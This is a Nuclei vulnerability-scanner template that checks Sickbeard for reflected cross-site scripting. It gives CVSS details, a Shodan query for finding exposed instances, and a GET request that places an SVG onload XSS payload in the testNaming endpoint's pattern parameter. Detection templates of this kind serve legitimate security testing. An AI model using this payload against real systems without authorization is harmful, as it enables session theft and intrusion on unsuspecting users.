id: sick-beard-xss

info:
  name: Sickbeard - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: Sickbeard contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://sickbeard.com/
    - https://github.com/midgetspy/Sick-Beard
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    shodan-query: sickbeard
  tags: xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - <svg/onload=alert(document.domain)>
        part: body
      - type: word
        words:
          - "text/html"
        part: header

# Enhanced by mp on 2022/09/23
